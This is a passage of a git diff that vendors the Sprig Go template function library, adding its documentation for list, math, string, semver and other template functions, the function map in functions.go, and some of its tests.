+until 5
+```
+
+The above generates the list `[0, 1, 2, 3, 4]`.
+
+This is useful for looping with `range $i, $e := until 5`.
+
+## untilStep
+
+Like `until`, `untilStep` generates a list of counting integers. But it allows
+you to define a start, stop, and step:
+
+```
+untilStep 3 6 2
+```
+
+The above will produce `[3 5]` by starting with 3, and adding 2 until it is equal
+or greater than 6. This is similar to Python's `range` function.
diff --git a/vendor/github.com/Masterminds/sprig/docs/lists.md b/vendor/github.com/Masterminds/sprig/docs/lists.md
new file mode 100644
index 0000000000..22441cec54
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/lists.md
@@ -0,0 +1,111 @@
+# Lists and List Functions
+
+Sprig provides a simple `list` type that can contain arbitrary sequential lists
+of data. This is similar to arrays or slices, but lists are designed to be used
+as immutable data types.
+
+Create a list of integers:
+
+```
+$myList := list 1 2 3 4 5
+```
+
+The above creates a list of `[1 2 3 4 5]`.
+
+## first
+
+To get the head item on a list, use `first`.
+
+`first $myList` returns `1`
+
+## rest
+
+To get the tail of the list (everything but the first item), use `rest`.
+
+`rest $myList` returns `[2 3 4 5]`
+
+## last
+
+To get the last item on a list, use `last`:
+
+`last $myList` returns `5`. This is roughly analogous to reversing a list and
+then calling `first`.
+
+## initial
+
+This compliments `last` by returning all _but_ the last element.
+`initial $myList` returns `[1 2 3 4]`.
+
+## append
+
+Append a new item to an existing list, creating a new list.
+
+```
+$new = append $myList 6
+```
+
+The above would set `$new` to `[1 2 3 4 5 6]`. `$myList` would remain unaltered.
+
+## prepend
+
+Push an alement onto the front of a list, creating a new list.
+
+```
+prepend $myList 0
+```
+
+The above would produce `[0 1 2 3 4 5]`. `$myList` would remain unaltered.
+
+## reverse
+
+Produce a new list with the reversed elements of the given list.
+
+```
+reverse $myList
+```
+
+The above would generate the list `[5 4 3 2 1]`.
+
+## uniq
+
+Generate a list with all of the duplicates removed.
+
+```
+list 1 1 1 2 | uniq
+```
+
+The above would produce `[1 2]`
+
+## without
+
+The `without` function filters items out of a list.
+
+```
+without $myList 3
+```
+
+The above would produce `[1 2 4 5]`
+
+Without can take more than one filter:
+
+```
+without $myList 1 3 5
+```
+
+That would produce `[2 4]`
+
+##  has
+
+Test to see if a list has a particular element.
+
+```
+has $myList 4
+```
+
+The above would return `true`, while `has $myList "hello"` would return false.
+
+## A Note on List Internals
+
+A list is implemented in Go as a `[]interface{}`. For Go developers embedding
+Sprig, you may pass `[]interface{}` items into your template context and be
+able to use all of the `list` functions on those items.
diff --git a/vendor/github.com/Masterminds/sprig/docs/math.md b/vendor/github.com/Masterminds/sprig/docs/math.md
new file mode 100644
index 0000000000..95f2f1e599
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/math.md
@@ -0,0 +1,63 @@
+# Math Functions
+
+All math functions operate on `int64` values unless specified otherwise.
+
+(In the future, these will be extended to handle floats as well)
+
+## add
+
+Sum numbers with `add`
+
+## add1
+
+To increment by 1, use `add1`
+
+## sub
+
+To subtract, use `sub`
+
+## div
+
+Perform integer division with `div`
+
+## mod
+
+Modulo with `mod`
+
+## mul
+
+Multiply with `mul`
+
+## max
+
+Return the largest of a series of integers:
+
+This will return `3`:
+
+```
+max 1 2 3
+```
+
+## min
+
+Return the smallest of a series of integers.
+
+`min 1 2 3` will return `1`.
+
+## floor
+
+Returns the greatest float value less than or equal to input value
+
+`floor 123.9999` will return `123.0`
+
+## ceil
+
+Returns the greatest float value greater than or equal to input value
+
+`ceil 123.001` will return `124.0`
+
+## round
+
+Returns a float value with the remainder rounded to the given number to digits after the decimal point.
+
+`round 123.555555` will return `123.556`
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/docs/os.md b/vendor/github.com/Masterminds/sprig/docs/os.md
new file mode 100644
index 0000000000..e4c197ad04
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/os.md
@@ -0,0 +1,24 @@
+# OS Functions
+
+_WARNING:_ These functions can lead to information leakage if not used
+appropriately.
+
+_WARNING:_ Some notable implementations of Sprig (such as 
+[Kubernetes Helm](http://helm.sh) _do not provide these functions for security
+reasons_.
+
+## env
+
+The `env` function reads an environment variable:
+
+```
+env "HOME"
+```
+
+## expandenv
+
+To substitute environment variables in a string, use `expandenv`:
+
+```
+expandenv "Your path is set to $PATH"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/paths.md b/vendor/github.com/Masterminds/sprig/docs/paths.md
new file mode 100644
index 0000000000..87ec6d45a2
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/paths.md
@@ -0,0 +1,43 @@
+# File Path Functions
+
+While Sprig does not grant access to the filesystem, it does provide functions
+for working with strings that follow file path conventions.
+
+# base
+
+Return the last element of a path.
+
+```
+base "foo/bar/baz"
+```
+
+The above prints "baz"
+
+# dir
+
+Return the directory, stripping the last part of the path. So `dir "foo/bar/baz"`
+returns `foo/bar`
+
+# clean
+
+Clean up a path.
+
+```
+clean "foo/bar/../baz"
+```
+
+The above resolves the `..` and returns `foo/baz`
+
+# ext
+
+Return the file extension.
+
+```
+ext "foo.bar"
+```
+
+The above returns `.bar`.
+
+# isAbs
+
+To check whether a file path is absolute, use `isAbs`.
diff --git a/vendor/github.com/Masterminds/sprig/docs/reflection.md b/vendor/github.com/Masterminds/sprig/docs/reflection.md
new file mode 100644
index 0000000000..597871f3c5
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/reflection.md
@@ -0,0 +1,38 @@
+# Reflection Functions
+
+Sprig provides rudimentary reflection tools. These help advanced template
+developers understand the underlying Go type information for a particular value.
+
+Go has several primitive _kinds_, like `string`, `slice`, `int64`, and `bool`.
+
+Go has an open _type_ system that allows developers to create their own types.
+
+Sprig provides a set of functions for each.
+
+## Kind Functions
+
+There are two Kind functions: `kindOf` returns the kind of an object.
+
+```
+kindOf "hello"
+```
+
+The above would return `string`. For simple tests (like in `if` blocks), the
+`isKind` function will let you verify that a value is a particular kind:
+
+```
+kindIs "int" 123
+```
+
+The above will return `true`
+
+## Type Functions
+
+Types are slightly harder to work with, so there are three different functions:
+
+- `typeOf` returns the underlying type of a value: `typeOf $foo`
+- `typeIs` is like `kindIs`, but for types: `typeIs "*io.Buffer" $myVal`
+- `typeIsLike` works as `kindIs`, except that it also dereferences pointers.
+
+**Note:** None of these can test whether or not something implements a given
+interface, since doing so would require compiling the interface in ahead of time.
diff --git a/vendor/github.com/Masterminds/sprig/docs/semver.md b/vendor/github.com/Masterminds/sprig/docs/semver.md
new file mode 100644
index 0000000000..e0cbfeb7ae
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/semver.md
@@ -0,0 +1,124 @@
+# Semantic Version Functions
+
+Some version schemes are easily parseable and comparable. Sprig provides functions
+for working with [SemVer 2](http://semver.org) versions.
+
+## semver
+
+The `semver` function parses a string into a Semantic Version:
+
+```
+$version := semver "1.2.3-alpha.1+123"
+```
+
+_If the parser fails, it will cause template execution to halt with an error._
+
+At this point, `$version` is a pointer to a `Version` object with the following
+properties:
+
+- `$version.Major`: The major number (`1` above)
+- `$version.Minor`: The minor number (`2` above)
+- `$version.Patch`: The patch number (`3` above)
+- `$version.Prerelease`: The prerelease (`alpha.1` above)
+- `$version.Metadata`: The build metadata (`123` above)
+- `$version.Original`: The original version as a string
+
+Additionally, you can compare a `Version` to another `version` using the `Compare`
+function:
+
+```
+semver "1.4.3" | (semver "1.2.3").Compare
+```
+
+The above will return `-1`.
+
+The return values are:
+
+- `-1` if the given semver is greater than the semver whose `Compare` method was called
+- `1` if the version who's `Compare` function was called is greater.
+- `0` if they are the same version
+
+(Note that in SemVer, the `Metadata` field is not compared during version
+comparison operations.)
+
+
+## semverCompare
+
+A more robust comparison function is provided as `semverCompare`. This version
+supports version ranges:
+
+- `semverCompare "1.2.3" "1.2.3"` checks for an exact match
+- `semverCompare "^1.2.0" "1.2.3"` checks that the major and minor versions match, and that the patch 
+  number of the second version is _greater than or equal to_ the first parameter.
+
+The SemVer functions use the [Masterminds semver library](https://github.com/Masterminds/semver),
+from the creators of Sprig.
+
+
+## Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma separated and comparisons. These are then separated by || separated or
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+* `=`: equal (aliased to no operator)
+* `!=`: not equal
+* `>`: greater than
+* `<`: less than
+* `>=`: greater than or equal to
+* `<=`: less than or equal to
+
+_Note, according to the Semantic Version specification pre-releases may not be
+API compliant with their release counterpart. It says,_
+
+> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._
+
+_SemVer comparisons without a pre-release value will skip pre-release versions.
+For example, `>1.2.3` will skip pre-releases when looking at a list of values
+while `>1.2.3-alpha.1` will evaluate pre-releases._
+
+## Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphens ranges.
+These look like:
+
+* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+## Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the pack level comparison (see tilde below). For example,
+
+* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `>= 1.2.x` is equivalent to `>= 1.2.0`
+* `<= 2.x` is equivalent to `<= 3`
+* `*` is equivalent to `>= 0.0.0`
+
+## Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+* `~1` is equivalent to `>= 1, < 2`
+* `~2.3` is equivalent to `>= 2.3, < 2.4`
+* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `~1.x` is equivalent to `>= 1, < 2`
+
+## Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparisons of API versions as a major change is API breaking. For example,
+
+* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+* `^2.3` is equivalent to `>= 2.3, < 3`
+* `^2.x` is equivalent to `>= 2.0.0, < 3`
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/string_slice.md b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
new file mode 100644
index 0000000000..25643ec1c1
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
@@ -0,0 +1,55 @@
+# String Slice Functions
+
+These function operate on or generate slices of strings. In Go, a slice is a
+growable array. In Sprig, it's a special case of a `list`.
+
+## join
+
+Join a list of strings into a single string, with the given separator.
+
+```
+list "hello" "world" | join "_"
+```
+
+The above will produce `hello_world`
+
+`join` will try to convert non-strings to a string value:
+
+```
+list 1 2 3 | join "+"
+```
+
+The above will produce `1+2+3`
+
+## splitList and split
+
+Split a string into a list of strings:
+
+```
+splitList "$" "foo$bar$baz"
+```
+
+The above will return `[foo bar baz]`
+
+The older `split` function splits a string into a `dict`. It is designed to make
+it easy to use template dot notation for accessing members:
+
+```
+$a := split "$" "foo$bar$baz"
+```
+
+The above produces a map with index keys. `{_0: foo, _1: bar, _2: baz}`
+
+```
+$a._0
+```
+
+The above produces `foo`
+
+## sortAlpha
+
+The `sortAlpha` function sorts a list of strings into alphabetical (lexicographical)
+order.
+
+It does _not_ sort in place, but returns a sorted copy of the list, in keeping
+with the immutability of lists.
diff --git a/vendor/github.com/Masterminds/sprig/docs/strings.md b/vendor/github.com/Masterminds/sprig/docs/strings.md
new file mode 100644
index 0000000000..8deb4cf6b0
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/strings.md
@@ -0,0 +1,397 @@
+# String Functions
+
+Sprig has a number of string manipulation functions.
+
+## trim
+
+The `trim` function removes space from either side of a string:
+
+```
+trim "   hello    "
+```
+
+The above produces `hello`
+
+## trimAll
+
+Remove given characters from the front or back of a string:
+
+```
+trimAll "$" "$5.00"
+```
+
+The above returns `5.00` (as a string).
+
+## trimSuffix
+
+Trim just the suffix from a string:
+
+```
+trimSuffix "-" "hello-"
+```
+
+The above returns `hello`
+
+## upper
+
+Convert the entire string to uppercase:
+
+```
+upper "hello"
+```
+
+The above returns `HELLO`
+
+## lower
+
+Convert the entire string to lowercase:
+
+```
+lower "HELLO"
+```
+
+The above returns `hello`
+
+## title
+
+Convert to title case:
+
+```
+title "hello world"
+```
+
+The above returns `Hello World`
+
+## untitle
+
+Remove title casing. `untitle "Hello World"` produces `hello world`.
+
+## repeat
+
+Repeat a string multiple times:
+
+```
+repeat 3 "hello"
+```
+
+The above returns `hellohellohello`
+
+## substr
+
+Get a substring from a string. It takes three parameters:
+
+- start (int)
+- length (int)
+- string (string)
+
+```
+substr 0 5 "hello world"
+```
+
+The above returns `hello`
+
+## nospace
+
+Remove all whitespace from a string.
+
+```
+nospace "hello w o r l d"
+```
+
+The above returns `helloworld`
+
+## trunc
+
+Truncate a string (and add no suffix)
+
+```
+trunc 5 "hello world"
+```
+
+The above produces `hello`.
+
+## abbrev
+
+Truncate a string with ellipses (`...`)
+
+Parameters: 
+- max length
+- the string
+
+```
+abbrev 5 "hello world"
+```
+
+The above returns `he...`, since it counts the width of the ellipses against the
+maximum length.
+
+## abbrevboth
+
+Abbreviate both sides:
+
+```
+abbrevboth 5 10 "1234 5678 9123"
+```
+
+the above produces `...5678...`
+
+It takes:
+
+- left offset
+- max length
+- the string
+
+## initials
+
+Given multiple words, take the first letter of each word and combine.
+
+```
+initials "First Try"
+```
+
+The above returns `FT`
+
+## randAlphaNum, randAlpha, randNumeric, and randAscii
+
+These four functions generate random strings, but with different base character
+sets:
+
+- `randAlphaNum` uses `0-9a-zA-Z`
+- `randAlpha` uses `a-zA-Z`
+- `randNumeric` uses `0-9`
+- `randAscii` uses all printable ASCII characters
+
+Each of them takes one parameter: the integer length of the string.
+
+```
+randNumeric 3
+```
+
+The above will produce a random string with three digits.
+
+## wrap
+
+Wrap text at a given column count:
+
+```
+wrap 80 $someText
+```
+
+The above will wrap the string in `$someText` at 80 columns.
+
+## wrapWith
+
+`wrapWith` works as `wrap`, but lets you specify the string to wrap with.
+(`wrap` uses `\n`)
+
+```
+wrapWith 5 "\t" "Hello World"
+```
+
+The above produces `hello world` (where the whitespace is an ASCII tab
+character)
+
+## contains
+
+Test to see if one string is contained inside of another:
+
+```
+contains "cat" "catch"
+```
+
+The above returns `true` because `catch` contains `cat`.
+
+## hasPrefix and hasSuffix
+
+The `hasPrefix` and `hasSuffix` functions test whether a string has a given
+prefix or suffix:
+
+```
+hasPrefix "cat" "catch"
+```
+
+The above returns `true` because `catch` has the prefix `cat`.
+
+## quote and squote
+
+These functions wrap a string in double quotes (`quote`) or single quotes
+(`squote`).
+
+## cat
+
+The `cat` function concatenates multiple strings together into one, separating
+them with spaces:
+
+```
+cat "hello" "beautiful" "world"
+```
+
+The above produces `hello beautiful world`
+
+## indent
+
+The `indent` function indents every line in a given string to the specified
+indent width. This is useful when aligning multi-line strings:
+
+```
+indent 4 $lots_of_text
+```
+
+The above will indent every line of text by 4 space characters.
+
+## nindent
+
+The `nindent` function is the same as the indent function, but prepends a new
+line to the beginning of the string.
+
+```
+nindent 4 $lots_of_text
+```
+
+The above will indent every line of text by 4 space characters and add a new
+line to the beginning.
+
+## replace
+
+Perform simple string replacement.
+
+It takes three arguments:
+
+- string to replace
+- string to replace with
+- source string
+
+```
+"I Am Henry VIII" | replace " " "-"
+```
+
+The above will produce `I-Am-Henry-VIII`
+
+## plural
+
+Pluralize a string.
+
+```
+len $fish | plural "one anchovy" "many anchovies"
+```
+
+In the above, if the length of the string is 1, the first argument will be
+printed (`one anchovy`). Otherwise, the second argument will be printed 
+(`many anchovies`).
+
+The arguments are:
+
+- singular string
+- plural string
+- length integer
+
+NOTE: Sprig does not currently support languages with more complex pluralization
+rules. And `0` is considered a plural because the English language treats it
+as such (`zero anchovies`). The Sprig developers are working on a solution for
+better internationalization.
+
+## snakecase
+
+Convert string from camelCase to snake_case.
+
+Introduced in 2.12.0.
+
+```
+snakecase "FirstName"
+```
+
+This above will produce `first_name`.
+
+## camelcase
+
+Convert string from snake_case to CamelCase
+
+Introduced in 2.12.0.
+
+```
+camelcase "http_server"
+```
+
+This above will produce `HttpServer`.
+
+## shuffle
+
+Shuffle a string.
+
+Introduced in 2.12.0.
+
+
+```
+shuffle "hello"
+```
+
+The above will randomize the letters in `hello`, perhaps producing `oelhl`.
+
+## regexMatch
+
+Returns true if the input string mratches the regular expression.
+
+```
+regexMatch "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}" "test@acme.com"
+```
+
+The above produces `true`
+
+## regexFindAll
+
+Returns a slice of all matches of the regular expression in the input string
+
+```
+regexFindAll "[2,4,6,8]" "123456789 
+```
+
+The above produces `[2 4 6 8]`
+
+## regexFind
+
+Return the first (left most) match of the regular expression in the input string
+
+```
+regexFind "[a-zA-Z][1-9]" "abcd1234"
+```
+
+The above produces `d1`
+
+## regexReplaceAll
+
+Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement.
+Inside string replacement, $ signs are interpreted as in Expand, so for instance $1 represents the text of the first submatch
+
+```
+regexReplaceAll "a(x*)b" "-ab-axxb-" "${1}W"
+```
+
+The above produces `-W-xxW-`
+
+## regexReplaceAllLiteral
+
+Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement
+The replacement string is substituted directly, without using Expand
+
+```
+regexReplaceAllLiteral "a(x*)b" "-ab-axxb-" "${1}"
+```
+
+The above produces `-${1}-${1}-`
+
+## regexSplit
+
+Slices the input string into substrings separated by the expression and returns a slice of the substrings between those expression matches. The last parameter `n` determines the number of substrings to return, where `-1` means return all matches
+
+```
+regexSplit "z+" "pizza" -1
+```
+
+The above produces `[pi a]`
+
+## See Also...
+
+The [Conversion Functions](conversion.html) contain functions for converting
+strings. The [String Slice Functions](string_slice.html) contains functions
+for working with an array of strings.
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/uuid.md b/vendor/github.com/Masterminds/sprig/docs/uuid.md
new file mode 100644
index 0000000000..1b57a330a9
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/uuid.md
@@ -0,0 +1,9 @@
+# UUID Functions
+
+Sprig can generate UUID v4 universally unique IDs.
+
+```
+uuidv4
+```
+
+The above returns a new UUID of the v4 (randomly generated) type.
diff --git a/vendor/github.com/Masterminds/sprig/example_test.go b/vendor/github.com/Masterminds/sprig/example_test.go
new file mode 100644
index 0000000000..2d7696bf9e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/example_test.go
@@ -0,0 +1,25 @@
+package sprig
+
+import (
+	"fmt"
+	"os"
+	"text/template"
+)
+
+func Example() {
+	// Set up variables and template.
+	vars := map[string]interface{}{"Name": "  John Jacob Jingleheimer Schmidt "}
+	tpl := `Hello {{.Name | trim | lower}}`
+
+	// Get the Sprig function map.
+	fmap := TxtFuncMap()
+	t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+
+	err := t.Execute(os.Stdout, vars)
+	if err != nil {
+		fmt.Printf("Error during template execution: %s", err)
+		return
+	}
+	// Output:
+	// Hello john jacob jingleheimer schmidt
+}
diff --git a/vendor/github.com/Masterminds/sprig/flow_control_test.go b/vendor/github.com/Masterminds/sprig/flow_control_test.go
new file mode 100644
index 0000000000..d4e5ebf03f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/flow_control_test.go
@@ -0,0 +1,16 @@
+package sprig
+
+import (
+	"fmt"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestFail(t *testing.T) {
+	const msg = "This is an error!"
+	tpl := fmt.Sprintf(`{{fail "%s"}}`, msg)
+	_, err := runRaw(tpl, nil)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), msg)
+}
diff --git a/vendor/github.com/Masterminds/sprig/functions.go b/vendor/github.com/Masterminds/sprig/functions.go
new file mode 100644
index 0000000000..f0d1bc12c1
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/functions.go
@@ -0,0 +1,281 @@
+package sprig
+
+import (
+	"errors"
+	"html/template"
+	"os"
+	"path"
+	"strconv"
+	"strings"
+	ttemplate "text/template"
+	"time"
+
+	util "github.com/aokoli/goutils"
+	"github.com/huandu/xstrings"
+)
+
+// Produce the function map.
+//
+// Use this to pass the functions into the template engine:
+//
+// 	tpl := template.New("foo").Funcs(sprig.FuncMap()))
+//
+func FuncMap() template.FuncMap {
+	return HtmlFuncMap()
+}
+
+// HermeticTextFuncMap returns a 'text/template'.FuncMap with only repeatable functions.
+func HermeticTxtFuncMap() ttemplate.FuncMap {
+	r := TxtFuncMap()
+	for _, name := range nonhermeticFunctions {
+		delete(r, name)
+	}
+	return r
+}
+
+// HermeticHtmlFuncMap returns an 'html/template'.Funcmap with only repeatable functions.
+func HermeticHtmlFuncMap() template.FuncMap {
+	r := HtmlFuncMap()
+	for _, name := range nonhermeticFunctions {
+		delete(r, name)
+	}
+	return r
+}
+
+// TextFuncMap returns a 'text/template'.FuncMap
+func TxtFuncMap() ttemplate.FuncMap {
+	return ttemplate.FuncMap(GenericFuncMap())
+}
+
+// HtmlFuncMap returns an 'html/template'.Funcmap
+func HtmlFuncMap() template.FuncMap {
+	return template.FuncMap(GenericFuncMap())
+}
+
+// GenericFuncMap returns a copy of the basic function map as a map[string]interface{}.
+func GenericFuncMap() map[string]interface{} {
+	gfm := make(map[string]interface{}, len(genericMap))
+	for k, v := range genericMap {
+		gfm[k] = v
+	}
+	return gfm
+}
+
+// These functions are not guaranteed to evaluate to the same result for given input, because they
+// refer to the environemnt or global state.
+var nonhermeticFunctions = []string{
+	// Date functions
+	"date",
+	"date_in_zone",
+	"date_modify",
+	"now",
+	"htmlDate",
+	"htmlDateInZone",
+	"dateInZone",
+	"dateModify",
+
+	// Strings
+	"randAlphaNum",
+	"randAlpha",
+	"randAscii",
+	"randNumeric",
+	"uuidv4",
+
+	// OS
+	"env",
+	"expandenv",
+}
+
+var genericMap = map[string]interface{}{
+	"hello": func() string { return "Hello!" },
+
+	// Date functions
+	"date":           date,
+	"date_in_zone":   dateInZone,
+	"date_modify":    dateModify,
+	"now":            func() time.Time { return time.Now() },
+	"htmlDate":       htmlDate,
+	"htmlDateInZone": htmlDateInZone,
+	"dateInZone":     dateInZone,
+	"dateModify":     dateModify,
+	"ago":            dateAgo,
+	"toDate":         toDate,
+
+	// Strings
+	"abbrev":     abbrev,
+	"abbrevboth": abbrevboth,
+	"trunc":      trunc,
+	"trim":       strings.TrimSpace,
+	"upper":      strings.ToUpper,
+	"lower":      strings.ToLower,
+	"title":      strings.Title,
+	"untitle":    untitle,
+	"substr":     substring,
+	// Switch order so that "foo" | repeat 5
+	"repeat": func(count int, str string) string { return strings.Repeat(str, count) },
+	// Deprecated: Use trimAll.
+	"trimall": func(a, b string) string { return strings.Trim(b, a) },
+	// Switch order so that "$foo" | trimall "$"
+	"trimAll":      func(a, b string) string { return strings.Trim(b, a) },
+	"trimSuffix":   func(a, b string) string { return strings.TrimSuffix(b, a) },
+	"trimPrefix":   func(a, b string) string { return strings.TrimPrefix(b, a) },
+	"nospace":      util.DeleteWhiteSpace,
+	"initials":     initials,
+	"randAlphaNum": randAlphaNumeric,
+	"randAlpha":    randAlpha,
+	"randAscii":    randAscii,
+	"randNumeric":  randNumeric,
+	"swapcase":     util.SwapCase,
+	"shuffle":      xstrings.Shuffle,
+	"snakecase":    xstrings.ToSnakeCase,
+	"camelcase":    xstrings.ToCamelCase,
+	"wrap":         func(l int, s string) string { return util.Wrap(s, l) },
+	"wrapWith":     func(l int, sep, str string) string { return util.WrapCustom(str, l, sep, true) },
+	// Switch order so that "foobar" | contains "foo"
+	"contains":  func(substr string, str string) bool { return strings.Contains(str, substr) },
+	"hasPrefix": func(substr string, str string) bool { return strings.HasPrefix(str, substr) },
+	"hasSuffix": func(substr string, str string) bool { return strings.HasSuffix(str, substr) },
+	"quote":     quote,
+	"squote":    squote,
+	"cat":       cat,
+	"indent":    indent,
+	"nindent":   nindent,
+	"replace":   replace,
+	"plural":    plural,
+	"sha1sum":   sha1sum,
+	"sha256sum": sha256sum,
+	"toString":  strval,
+
+	// Wrap Atoi to stop errors.
+	"atoi":    func(a string) int { i, _ := strconv.Atoi(a); return i },
+	"int64":   toInt64,
+	"int":     toInt,
+	"float64": toFloat64,
+
+	//"gt": func(a, b int) bool {return a > b},
+	//"gte": func(a, b int) bool {return a >= b},
+	//"lt": func(a, b int) bool {return a < b},
+	//"lte": func(a, b int) bool {return a <= b},
+
+	// split "/" foo/bar returns map[int]string{0: foo, 1: bar}
+	"split":     split,
+	"splitList": func(sep, orig string) []string { return strings.Split(orig, sep) },
+	"toStrings": strslice,
+
+	"until":     until,
+	"untilStep": untilStep,
+
+	// VERY basic arithmetic.
+	"add1": func(i interface{}) int64 { return toInt64(i) + 1 },
+	"add": func(i ...interface{}) int64 {
+		var a int64 = 0
+		for _, b := range i {
+			a += toInt64(b)
+		}
+		return a
+	},
+	"sub": func(a, b interface{}) int64 { return toInt64(a) - toInt64(b) },
+	"div": func(a, b interface{}) int64 { return toInt64(a) / toInt64(b) },
+	"mod": func(a, b interface{}) int64 { return toInt64(a) % toInt64(b) },
+	"mul": func(a interface{}, v ...interface{}) int64 {
+		val := toInt64(a)
+		for _, b := range v {
+			val = val * toInt64(b)
+		}
+		return val
+	},
+	"biggest": max,
+	"max":     max,
+	"min":     min,
+	"ceil":    ceil,
+	"floor":   floor,
+	"round":   round,
+
+	// string slices. Note that we reverse the order b/c that's better
+	// for template processing.
+	"join":      join,
+	"sortAlpha": sortAlpha,
+
+	// Defaults
+	"default":      dfault,
+	"empty":        empty,
+	"coalesce":     coalesce,
+	"compact":      compact,
+	"toJson":       toJson,
+	"toPrettyJson": toPrettyJson,
+	"ternary":      ternary,
+
+	// Reflection
+	"typeOf":     typeOf,
+	"typeIs":     typeIs,
+	"typeIsLike": typeIsLike,
+	"kindOf":     kindOf,
+	"kindIs":     kindIs,
+
+	// OS:
+	"env":       func(s string) string { return os.Getenv(s) },
+	"expandenv": func(s string) string { return os.ExpandEnv(s) },
+
+	// File Paths:
+	"base":  path.Base,
+	"dir":   path.Dir,
+	"clean": path.Clean,
+	"ext":   path.Ext,
+	"isAbs": path.IsAbs,
+
+	// Encoding:
+	"b64enc": base64encode,
+	"b64dec": base64decode,
+	"b32enc": base32encode,
+	"b32dec": base32decode,
+
+	// Data Structures:
+	"tuple":  list, // FIXME: with the addition of append/prepend these are no longer immutable.
+	"list":   list,
+	"dict":   dict,
+	"set":    set,
+	"unset":  unset,
+	"hasKey": hasKey,
+	"pluck":  pluck,
+	"keys":   keys,
+	"pick":   pick,
+	"omit":   omit,
+	"merge":  merge,
+
+	"append": push, "push": push,
+	"prepend": prepend,
+	"first":   first,
+	"rest":    rest,
+	"last":    last,
+	"initial": initial,
+	"reverse": reverse,
+	"uniq":    uniq,
+	"without": without,
+	"has":     has,
+
+	// Crypto:
+	"genPrivateKey":     generatePrivateKey,
+	"derivePassword":    derivePassword,
+	"buildCustomCert":   buildCustomCertificate,
+	"genCA":             generateCertificateAuthority,
+	"genSelfSignedCert": generateSelfSignedCertificate,
+	"genSignedCert":     generateSignedCertificate,
+
+	// UUIDs:
+	"uuidv4": uuidv4,
+
+	// SemVer:
+	"semver":        semver,
+	"semverCompare": semverCompare,
+
+	// Flow Control:
+	"fail": func(msg string) (string, error) { return "", errors.New(msg) },
+
+	// Regex
+	"regexMatch":             regexMatch,
+	"regexFindAll":           regexFindAll,
+	"regexFind":              regexFind,
+	"regexReplaceAll":        regexReplaceAll,
+	"regexReplaceAllLiteral": regexReplaceAllLiteral,
+	"regexSplit":             regexSplit,
+}
diff --git a/vendor/github.com/Masterminds/sprig/functions_test.go b/vendor/github.com/Masterminds/sprig/functions_test.go
new file mode 100644
index 0000000000..edf88a3255
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/functions_test.go
@@ -0,0 +1,108 @@
+package sprig
+
+import (
+	"bytes"
+	"fmt"
+	"math/rand"
+	"os"
+	"testing"
+	"text/template"
+
+	"github.com/aokoli/goutils"
+	"github.com/stretchr/testify/assert"
+)
+
+func TestEnv(t *testing.T) {
+	os.Setenv("FOO", "bar")
+	tpl := `{{env "FOO"}}`
+	if err := runt(tpl, "bar"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestExpandEnv(t *testing.T) {
+	os.Setenv("FOO", "bar")
+	tpl := `{{expandenv "Hello $FOO"}}`
+	if err := runt(tpl, "Hello bar"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestBase(t *testing.T) {
+	assert.NoError(t, runt(`{{ base "foo/bar" }}`, "bar"))
+}
+
+func TestDir(t *testing.T) {
+	assert.NoError(t, runt(`{{ dir "foo/bar/baz" }}`, "foo/bar"))
+}
+
+func TestIsAbs(t *testing.T) {
+	assert.NoError(t, runt(`{{ isAbs "/foo" }}`, "true"))
+	assert.NoError(t, runt(`{{ isAbs "foo" }}`, "false"))
+}
+
+func TestClean(t *testing.T) {
+	assert.NoError(t, runt(`{{ clean "/foo/../foo/../bar" }}`, "/bar"))
+}
+
+func TestExt(t *testing.T) {
+	assert.NoError(t, runt(`{{ ext "/foo/bar/baz.txt" }}`, ".txt"))
+}
+
+func TestSnakeCase(t *testing.T) {
+	assert.NoError(t, runt(`{{ snakecase "FirstName" }}`, "first_name"))
+	assert.NoError(t, runt(`{{ snakecase "HTTPServer" }}`, "http_server"))
